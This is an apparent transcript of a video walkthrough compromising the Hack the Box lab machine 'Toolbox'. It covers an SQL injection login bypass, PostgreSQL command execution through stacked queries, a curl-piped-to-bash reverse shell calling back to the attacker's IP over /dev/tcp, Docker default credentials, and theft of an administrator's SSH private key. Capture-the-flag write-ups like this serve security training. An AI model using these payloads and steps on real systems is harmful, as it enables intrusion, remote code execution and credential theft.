Hey, what's up, everybody? This is Matt once again, and today we're going to be rooting Toolbox from Hack the Box. This is an easy level machine, and I think it's pretty fun. And yes, just that. We can just start off by scanning the host, and I'm going to walk you through the command I used as always, and I use nmap with the parameter pn to tell nmap the host is already up and running. SV that will perform a service version detection scan, right? Effectively adding this column right here with the version of every service. The C appended to it is a shorthand for tag as C, which will execute some default scripts from nmap to each of those. You can see them right here, like the FTP anon, FTP syst, or the SSH host key, and so on and so forth. Tag p tag will scan the whole range of ports, which are 65,535. Obviously, this is a different figure as there are some open, and this is just about closed ports. Tag N will disable DNS resolution, making it faster. The mean rate of 500 will send no less than 500 packages a minute. And tag V will make it verbose. Tag ON, that's to save the output, this, to a file called general in a folder named nmap. And this is our IP, and that's it. So we have FTP for file silo on port 21. We have OpenSSH for Windows 7.7 on 22. We have some RPC endpoints on 135 and 139. Since this is from SMB, we should have a 445, and we do right here. But before that, we have a 443, which is HTTP over SSL. Right now, if you take a look at this, you'll see that, whenever we have a SSL web server, we must check the certificate, right? For some information being leaked or something like that. But in this case, the default script does it for us. So we have a common name for admin.megalogistic.com, and every time we have this, at least in Hack the Box, we want to add it to our etc hosts file. That way we will have the domain routed. But let me keep going with the nmap scan. So we have 5985 open, and 47001, and a bunch of them from 49,000. These are just RPC endpoints, and as far as I know, they're not exploitable. Maybe not. They're just like laying there. That's it. So we can go ahead and check what is it? What was it? Megalogistic.com. If you search it, you won't find anything, because as I said before, you need to add an entry to your etc hosts file. Okay, so we have this, and you need to specify your IP here, and then your admin megalogistic.com, and since admin is a subdomain or a vhost, you will need to specify megalogistic.com just like that in another entry. They are separated by spaces, right? If you don't know what etc host is, you know that this is just like a local DNS server, in terms of that you have an IP resolved to a domain. For example, when you type localhost, it is the same as typing 127.0.0.1 just because of this file, right? And just like that. In the IPv6 as well, if you type localhost, it's the very same as typing ::1. That's literally the same, and that's it. Now this is managed by root, so I have permissions denied. Don't forget to use it with sudo. but that's fine. So I need to hit here accept the risk and continue, since I mean the box is using a self-signed certificate, right? It is not signed by a respectable authority like in the real world. So if we want to do this manually, like we can do this here in more information, and you can start seeing here website megalogistic.com, and we can check this certificate. We will see that we have a common name for admin megalogistic.com, email address admin@megalogistic.com. That could me in a scene task or something like a phishing task or something like that. But that's cool. Now what happens when we access the admin website or vhost? Well, we have a login panel, right? Now you can, and I encourage you to do, is to click around, just familiarize yourself with the website, fuzz here on routes, use the HTML extension to fuzz. I want to show you guys, just because this is not the intended path, but I mean we won't find anything, but how to fuzz for other subdomains like this one. So let me show you that just now. But we can use FFUF, that's my preferred tool for fuzzing, super useful. Taxi for colored output, URL https megalogistic.com. Okay, the fuzz could be here for directories, but remember this for the future. In order to fuzz for vhosts, you need to do it differently. So I'm going to be using, first of all, a word list from user, share, seg lists, discovery, DNS, subdomain, tab 1 million and 20,000 entries. I'm going to be using 200 threads. That's a header. I'm going to be using the host header because here's where I want to specify the fuzz keyword. So fuzz.megalogistic.com, and that should do the work. If we do that, we're going to see a lot of output in there, so we need to start filtering out. We want to filter by size, which is the well, you could filter by words with tag FW, or by size with size FS, or with status with FC for filter code, for lines FL, and that's it. I don't think you can filter out by duration, not sure about it. So yeah, filter size, this guy from here, and let's do that. And we will find the admin because it redirects us to a specific location, and this panel has a size of 8089, while the other ones has a size of 22,357 bytes of size. You know, it's like if you as whatever, you will redirect you back to this website. That's the size about, right? And I think it went down. Yeah, probably. But that's okay. Well, let me just make sure the login panel is still up. Asked. Yeah, so we're good. But let me take this. Well, actually now, let me just try something here. For example, we don't have anything here. Of course, you can start fuzzing again, like in here. Let me just try a colon, a apostrophe, right? So we see PG query failed, error, syntax error, at or near, whatever. And it says, like, well, it shows a part of the query, which it says select, probably. I mean, everything from users, where username, apostrophe, and password, MD5, apostrophe. And remember, we have an extra apostrophe here because of the apostrophe character we entered just now, right? So what about if I do something like this? Or, I mean, just like this. Let me show you this here. So nano test. Here must be select. So what about if you select or whatever? Select everything from username where this is our apostrophe. What about if we or 1 equals 1, and we close out our query and we put out some comments like this. All this will be commented out, meaning it will select everything where a username is nothing. That won't exist, of course, but if it evaluates a OR condition, if 1 equals 1 is true, which it is, we know that, right? Then the whole condition will be true, hence we would be allowed access. So let's try that. So 1 equals 1, just like this, and comments. And look at that, we're logged in. So we can start clicking around again, like just familiarizing ourselves with the contents of this dashboard. And I see a list here. This is information leakage, super dangerous, of course. Builders at Megacorp, this might be some clients that has put up some orders. You have companies delivering numbers, the status, whether it's premium or not. But besides that, I don't see anything different now. Megacorp, that is just a custom software, so it's 1.0.0. But what else do we have in here? Cloudflare as a CDN, which is content delivery network. Nothing rare, nothing strange. So why don't we try to find a way to exploit that SQL injection further, right? Actually, let me make a logistic here and send a request to Burp Suite. So let me try this like ASD just to make sure it gets to Burp Suite. Log in, and then we can send it out to the repeater. Intercept is off now, and here we can start trying some things. Okay, let's try again our apostrophe here. We see the error, and what you can do right now is try, for example, SQL injection, and you don't know what DBMS is, right? So what about we looking for PG query, like PG query, what is, not like that. We'll see that it says nothing here. PG query, so you can DBMS. Just add it. Let's see. So it says PostgreSQL. PostgreSQL, yeah. Let's PostgreSQL. And that makes sense, right? Postgres query, right? So that is cool. So we could try, for example, SQL injection, Postgres hack tricks, for example, Bible of hacking, and PostgreSQL injection. Let's try that. RC with PostgreSQL extensions. Let's open that up as well, just in case. And what do we have here? We have WAF bypass, attacks, string syntax, a lot of things. Let me check this here. Yeah, well, I mean, it's kind of the same page, similar at least. We have in here RC and Linux, I saw. Yeah, not anymore. Okay, so in here, That's fine. RC in Linux, RC in Windows. What is that? Okay, let me revise that, because what about if we look for SQL metrics, like a general entry? SQL injection. Let me look for RCE in here. Motherfucker. Okay, so I don't see what I used before. Okay guys, so I just looked up for PostgreSQL injection hack trick. So here I ended up open deep in testing PostgreSQL general entry, and I found it, the RC section, right? So here it says that we can execute some commands just by querying the database. So this is by doing some stacked queries, right? Which means stacked queries that you can do query 1 here, query 2 here, query 3 here, pretty much like we do in Linux. So why don't we do that? Like here it closes, then a different query starts, then drop if table if exists. It does not exist, obviously. We can create it. So like this, and then like that, as we were doing. And Control U to URL encode. Let me have the semicolon like that, just like that. Okay, so we go, and it says 200. Okay, already exists. Well, I mean, I reset the machine when I first did it, but okay, I don't know. So let me drop it. 200. Okay, that's fine. And let me create it once again. So you like that, and 200. Okay, so it got created, right? So I can copy just like this ID just to test, and Control U to URL encode it. 200. Okay, no errors. What about if we select everything here? And it says 300 found. Now, what I did here was to query this table from SQL map, right? So let me check here rec, and I'm gonna be using the following because nano downloads rec. You need to have this parameter just like a common one, otherwise it'll get confused. So just that. So I'm gonna use SQL map R from request. Let me use this trick. Then I can use batch so that it wouldn't ask me anything. And I'm gonna be using DVMS PostgreSQL. I'm gonna be using I don't know, 100 threads. Also, I want to enumerate the DVSs, right? Well, let us go with that. Actually, it says unable to connect to the target URL. That's because it's self-signed certificate. So again, I want to go with Force SSL, and that will do the work. So let us wait until this works out. As you can see, it is asking, for example, here for the remaining tests, you want to include all tests for PostgreSQL extending provided level and risk 1 level. Yes, that's batched. That is the batched mode. We just need to wait here. In the meantime, let me just go ahead and review the FTP service. Okay, let me close, exit, because I don't hide the IP, right? So let me just copy this IP, and then FTPT. My God. So let me define my variable t as the IP, and then I can invoke it with $, right? Here I want to go as anonymous and regular password. So we have a FTP, okay, a FTP owned file named Docker Toolbox. It weighs a lot. I don't know how much it is, like 2 gigas, like that. So Docker Toolbox, we can start querying it right now. So Google goes like this, and we can start Docker Toolbox, right? And well, look at that. I mean, it says default credentials. That might be something we're interested into looking at. But in the meantime, let's just check what this is, right? What is Docker Toolbox for? Docker Toolbox is an installer for quick setup and launch of a Docker environment on older Mac and Windows systems that do not meet the requirements of the new Docker desktop for Mac. Okay, and that makes sense. Plus, we can ping P, and we'll see that we have a ping and a time to live of 127, which is pretty good indication that it's a Windows-based machine. Otherwise, if it were Linux, it would be 64, right? "64 time to live." Time to live is just the number of hops we are away from. I mean, one machine is away from another, right? This is a networking concept. So okay, so that makes sense. Now that I see here, I don't see any like any command injection table like the one we were supposed to create. So let me remove the threads just in case, I don't know, maybe it had some trouble with it, and tac flush so that the new like request will not be taken from cache rather than made it from scratch, right? Made from scratch. So that's it. Let us wait a little bit again, because we executed the command ID, which is Linux based. I mean, there's no such ID from Windows, right? Let me check in here the RC entry. Okay, from ID, cool. Let me see if it gets reload or what. Okay. CPG cargo information schema. Don't tell me, bro. You're not gonna find it. This makes no sense. It hasn't yet. I mean, it says already exists, so it should find it, but it's not. And this is weird because when I did it first time, I actually saw it. So it's kind of weird. If you're following my walkthrough, you're probably seeing it too. And if you query it, you will see that it actually got executed the ID command, right? But otherwise, we should try another ways of testing if this actually works. So here, instead of ID, now we try to ping a C1, for example, then we'll try with N for Windows. So we will see then 1044, and for that case, we're using TCP dump, disable DNS resolution, interface done 0, and ICMP packets, right? Now we're listening. So let me here, Control U, and it says okay. Command not found. I don't know what that even means. Either way. Let me see if we're on Linux. Let me see if we can curl ourselves. Python 3, aim HTTP server 8080. 8000, okay. 8000. Let me curl myself. So it says 200 okay. And I see a GET request, so that means ping is probably not installed, or I don't know, kind of restricted maybe. So we can curl. This is a good attack vector actually, because if you don't know, this is something good to learn. We can let me try something here because I don't know, I'm not sure. Here. Well, look at that. Okay, so in Linux, when you execute something like the following, in this kind of apostrophes, I don't know what their name is, you will see that the command actually gets executed, right? So if we do this echo, you will see that it gets executed. It's the same. So what I tried is I queried the ID command, right? And I don't know what will happen if I do something like this, echo ID. Okay. Right, didn't work. Maybe a double. Nope. Okay, so it works, but just like this. So ID and the following. So now I can, who am I, right? Pretty much just short strings like Postgres, UID, what else? I don't know. Your name. Okay, that doesn't work. Oh, I got, yeah. There was a apostrophe missing, so send it. And Linux, okay, that works. That's more than enough for a proof of concept. And what can we do now? We can do this, okay? Go to PD exploits. We can create a file named shell, for example, which will be treated as a, actually let's call it index.html. I'll tell you why in a minute. I'm going to be treating it as a bash script, and from here I'm going to be using bin bash -c for command line option, and inside apostrophes I'm going to be using bash interactive mode, like this, dev TCP, and 10.14.4, that's my VPN IP, and 4444. That means we'll be setting up a NCMVLP listener here, right? So we have 10 10 4 4 4. Okay, let's set up an extra redirection. So that is fine. Let me go to exploits and fire up my simple HTTP server again. That will do it. So what's up? When we query just this, when you curl or query a website without any directory or file, it will invoke automatically an index.html file. That is automatic. So if we do this, look at this. I'm not invoking anything, right? It's just 10.14.4 colon 8000, right? And here you will see it's actually getting this, and it's at 200 because there's an index.html that is being taken, right? So we can go ahead and pipe this to bash, and that will take this content and will be executed with bash, right? Just like if I did this, index and bash. Obviously I'm gonna get a shell from myself, right? But NCMVLP, so let's do that right now, and there you go, we have a shell, right? So I'm gonna stabilize it myself with script def null here and cbash, and I'm gonna be using Control Z in order to background it or suspend it. I'm gonna be using stt raw minus echo foreground as an FG, and then reset xterm. That's it. I want to export a variable term for xterm. What this specifically command will do is that it will allow us to press Control L in order to clean our window, right? Now let's get started with the enumeration. Sudo tag L. There's no such command. I don't know. Let's cron tab. We see a service PostgreSQL restart. That's fine. Let's check the root of this system. There we see a Docker environment. So if we do hostname IPA, if config, we're going to see we are on 172.17.02. Okay, and that's okay. And after you have exhausted all your enumeration skills, you want to come back here at our Google query. Remember that default credentials thing we saw? If you keep looking at it, you'll know that, let's see, let's keep checking this. For example, here, code samples to SSH into Docker machine VirtualBox. Enter Docker as username and TC user as password, and that is PuTTY. Right? So, okay. I think that every time that cron job gets executed, it messes our shell app, right? So we need to be quickly in this. Again, this will be giving you a headache, but this is just a walkthrough video. I'm just gonna be speeding it up, right? So let me just click exit. I have no other way. Oh, okay, you'll let me NCMVLP once again. 4444. Now let me call it again in here. So again, quickly, def null c bash ct raw minus echo fg reset xterm export term xterm, and if config, if we are 0.2, I think Docker is in 172.17.0.1. Otherwise, we can just perform a ping sweep scan and that will do it. So look at that. It actually asks us for a password. So tc user, was it? Yes, indeed. And we have a shell in another container, I think. Yep. But this container is under 192.168, right? So let me just sudo l as always, and look at that. I can execute any command, so I'm gonna be doing a sudo su root, and that's it. I'm root. So let me go to root just to see what's up. lsla. Okay, lsla in here, for example. And right off the bat, I just see something interesting. This folder, C. So I can, for example, devh. This is pretty common in Docker environments, where if you check the df tag h, will show you the desk distribution. So we'll see that C users has a 70% of use. Right, and it's mounted on there. So this is a different location. So let me go there and see the users. I will see that we have administrator, all users, default users, public, Tony, desktop data, INE. That is pretty representative of Windows like folders. So what about checking lsla administrator? Well, a lot of information in here. No, what did I do? What did I do? I don't know what I did. Okay, yeah, I know what I did. Right, so this was the first window I was doing the mission. Okay, so let me, I don't know how to, yeah, I just zoomed it. Okay, so we have a .ssh folder in here. So why don't we go there? Administrators, .ssh, for example, lsla, and we can just cat idrsa dot pub and the idrsa normal file, private key. So I'm gonna be copying this. Gonna be cd contents nano idrsa. Remember this for this to work, we are going to be using shamat 600 idrsa. So let me show you idrsa, right? Shamat 600 idrsa. Look at the difference. So 0 0, well, the other one, and 600. All right, which is, I think, 1, 2, 4 in binary. So 0, 2, 4, 2 plus 4, 6, 6, 0, 0, right? So SSH administrator at my IP, and I'm going to be using an identity file as idrsa. I'm going to be saying yes, and look at that, we're here, administrator. So just their desktop, and look at that. So deb type desktop root, and there you go. That's our flag. So that's it. That was Toolbox from Hack the Box. I really hope you guys liked it. I think it was pretty interesting. It was funny, right? So I hope you guys liked it as I did, and I'll see you later. Thank you for joining.